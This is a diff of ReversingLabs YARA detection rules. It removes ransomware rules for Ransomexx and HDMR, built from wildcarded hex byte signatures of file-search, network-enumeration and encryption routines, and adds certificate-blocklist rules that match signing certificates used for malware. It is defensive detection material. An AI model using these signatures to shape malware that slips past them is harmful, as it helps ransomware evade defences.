+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15332-L15348"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b348c502aeae036f6d17283260ed4479427f89c8c25f2b6d59e137e90694dbe4"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $hermes_find_files_v1_p* ) ) and ( all of ( $hermes_encrypt_files_v1_p* ) ) ) or ( ( all of ( $hermes_find_files_v2_p* ) ) and ( all of ( $hermes_encrypt_files_v2_p* ) ) ) ) and ( any of ( $hermes_enum_resources_v* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMS INTERACTIVE MEDIA SOLUTIONS" and pe.signatures [ i ] . serial == "22:ac:ca:d2:35:fb:1a:c7:42:2e:be:5e:a7:ac:9b:c5" and 1019001600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ransomexx : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ransomexx ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5e62660d-2696-56c7-9322-fed6ce9d36ff"
-		date = "2020-11-26"
-		modified = "2020-11-26"
+		id = "e1834597-4e45-5866-97f4-e00c79190930"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Ransomexx.yara#L1-L147"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "27b4132b7f16cafc40687e96a552ce59cc24ebf7679575680f170e3beee8a0a9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15350-L15366"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "78ede4b02cb1b07500cd0c4f1f33da598938940d0f58430edda00d79b19b16a5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ransomexx"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B F4 B3 ?? 85 F6 74 ?? C6 46 ?? ?? B0 ?? 66 C7 06 ?? ?? 88 5E ?? 88
-            46 ?? 8B C7 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8B C6 8D 78 ?? 8A 08 40 84
-            C9 75 ?? 2B C7 8D 84 10 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ??
-            ?? 8B F0 89 75 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C3 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 89 45 ?? 85 C0 74 ?? C6 40 ?? ?? 88 18 88
-            58 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 49 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50
-            ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F
-            84 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A
-        }
-		$find_files_p2 = {
-            51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B C7 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 70 ??
-            8D 64 24 ?? 8A 08 40 84 C9 75 ?? 8B 1D ?? ?? ?? ?? 2B C6 8D 94 10 ?? ?? ?? ?? 52 6A
-            ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 56 FF
-            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ??
-            ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 6A ?? 56 FF 15
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 6A ??
-            FF D3 50 FF 15 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E
-            5B 8B E5 5D C3
-        }
-		$find_files_p3 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B C7
-            8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D B4 00 ?? ?? ?? ?? 8D 86
-            ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ??
-            ?? ?? 56 57 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 4C 24 ??
-            51 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8B 3D ?? ?? ?? ?? FF D7 83 F8 ??
-            0F 84 ?? ?? ?? ?? FF D7 E9 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B
-            4D ?? 56 51 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 56 8D 94 24
-            ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? 66 83 38 ?? 74 ?? 68 ?? ?? ?? ?? 50 FF D7 85 C0 75 ?? FF 05 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 39 05 ?? ?? ?? ?? 0F 84
-            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 54 24 ?? 52 FF D7 85 C0 74 ?? 8D 44
-        }
-		$find_files_p4 = {
-            24 ?? 50 8D 4C 24 ?? 51 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B 0D ??
-            ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 54 24 ?? 52 8D 44 24 ?? 50 FF D7 85 C0 74 ??
-            8D 4C 24 ?? 51 8D 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B
-            0D ?? ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? 8B 44 24 ?? 0B 44 24 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? 6A ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ??
-            80 3B ?? 75 ?? 80 7B ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 04 17 53
-            50 FF 15 ?? ?? ?? ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 14 0F 68 ?? ??
-            ?? ?? 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 07 68 ?? ?? ?? ?? 53 51 FF 15 ?? ??
-            ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 17 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24
-            ?? 50 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 33 C0
-            5B 8B E5 5D C2
-        }
-		$enum_network_resources = {
-            55 8B EC 8B 4D ?? 83 EC ?? 8D 45 ?? 50 51 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ??
-            FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 57 90 8B 4D ?? 8D
-            55 ?? 52 56 8D 45 ?? 50 51 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 8D 64 24 ?? F6 46 ?? ?? 74 ?? F6 46 ?? ?? 74 ??
-            8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 94 00 ?? ?? ?? ?? 52
-            6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 85 C0 74 ??
-            8B 16 0F B7 0A 66 89 08 83 C2 ?? 83 C0 ?? 66 85 C9 75 ?? FF 05 ?? ?? ?? ?? 8B 56 ??
-            83 E2 ?? 80 FA ?? 75 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 C6 ?? 3B 7D ?? 72
-            ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ??
-            ?? 8B F4 85 F6 0F 84 ?? ?? ?? ?? 8B D6 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 81
-            EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 8B CE 8B FE 81 EA ?? ?? ?? ?? 33 C0 81 E9 ??
-            ?? ?? ?? 81 EF ?? ?? ?? ?? 83 C2 ?? C6 46 ?? ?? 89 55 ?? 8B 5D ?? 8A D0 80 E2 ?? 02
-            90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 01 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ??
-            ?? ?? 32 90 ?? ?? ?? ?? 88 94 07 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
-            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
-            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
-            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 83 C0 ?? 32
-            90 ?? ?? ?? ?? 88 54 06 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 4D ?? 50 51
-            FF 15 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? C7 45
-            ?? ?? ?? ?? ?? FF D6 85 C0 75 ?? 8B 3D ?? ?? ?? ?? 8D 49 ?? 68 ?? ?? ?? ?? FF D7 8D
-            45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 85 C0 74 ?? 50 FF 15 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B FC 85 FF 0F 84 ?? ?? ?? ?? 8B D7 81 EA ?? ?? ??
-            ?? 83 C2 ?? 89 55 ?? 8B D7 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D7 8B CF 8B F7 81
-        }
-		$encrypt_files_p2 = {
-            EA ?? ?? ?? ?? 33 C0 81 E9 ?? ?? ?? ?? 81 EE ?? ?? ?? ?? 83 C2 ?? C6 47 ?? ?? 89 55
-            ?? 8B 5D ?? 8A D0 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 08 ?? ?? ?? ??
-            8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 30 ?? ?? ?? ?? 8D 50 ??
-            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ??
-            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ??
-            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8D 50 ?? 80 E2 ??
-            02 90 ?? ?? ?? ?? 83 C0 ?? 32 90 ?? ?? ?? ?? 88 54 07 ?? 83 F8 ?? 0F 8C ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B 4D ??
-            B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0 ?? 2B
-            C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B CA C1
-            E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 DB 0F 84 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B
-            4D ?? B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0
-            ?? 2B C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B
-            CA C1 E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 65 ?? 5F 5E 5B 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "4d:29:75:7c:4f:bf:c3:2b:97:09:1d:96:e3:72:30:02" and 1474848000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "6ea47017-1296-5409-8ff2-ef69434233ff"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15368-L15384"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "88c63a921a300e1b985d084c3ab1a2485713b4c674dafd419d092e5562f121d7"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_network_resources ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "3a:94:9e:f0:3d:9d:d2:d1:50:b2:4b:27:4f:f6:d7:b4" and 1474156800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_HDMR : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HDMR ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "97b5020c-6cb1-5ec6-84a4-2f35eae761c2"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "70e770dd-95fd-5273-b6ee-9bb5eea30e3b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.HDMR.yara#L1-L161"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "035c6596db8dc14a663679c1f7e682b85963927cc034b01e390cc22fdee3334a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15386-L15404"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "84ddc08a0a55200f644778a0e3482f15e82d74c524f12a7ad91b1c3d4acfc731"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HDMR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 8B 75 ?? 57 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 74 24 ??
-            66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ??
-            ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB
-            ?? 8D 49 ?? 8B 74 24 ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ??
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8D 44 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83
-            C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
-        }
-		$find_files_p2 = {
-            54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4C 24
-            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24
-            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 68
-            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 54 24 ?? 68 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D
-            8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52
-            56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83
-            C4 ?? 85 F6 74 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            8B 0D ?? ?? ?? ?? 83 C4 ?? 3B 0D ?? ?? ?? ?? 7C ?? 8D 49 ?? 6A ?? FF 15 ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? FF D7 FF 05 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF D3 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D
-            C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 33 C0 8B D9 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 5C 24 ?? 66
-            89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BF ?? ??
-            ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ??
-            ?? 83 C6 ?? 83 C7 ?? 81 FE ?? ?? ?? ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51
-            53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 8C ?? ?? ?? ?? 8B
-            7C 24 ?? 7F ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B F0 89 7C 24 ?? 89 74 24 ?? 85 C0 7C ??
-            7F ?? 83 FF ?? 76 ?? 6A ?? 6A ?? 6A ?? 53 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            33 C0 50 8D 54 24 ?? 52 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 88 44 24 ?? 6A ?? 8D
-            44 24 ?? 50 53 C6 44 24 ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C7 83 E8
-            ?? 8B CE 83 D9 ?? 33 F6 39 44 24 ?? 75 ?? 3B F1 75 ?? 8B 4C 24 ?? 3B 0D ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 C6 44
-        }
-		$encrypt_files_p2 = {
-            24 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ??
-            ?? ?? ?? 40 88 44 34 ?? 46 83 FE ?? 7C ?? 8B 44 24 ?? BE ?? ?? ?? ?? 85 C0 0F 8F ??
-            ?? ?? ?? 0F 8C ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 85 C0 0F 8C ?? ?? ??
-            ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 85 C0 7F ?? 7C ?? 3B FE 73 ?? 6A ?? 6A ?? 50 57 E8
-            ?? ?? ?? ?? 8B F7 2B F0 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44 24
-            ?? 3B F8 74 ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 74 24 ??
-            75 ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4
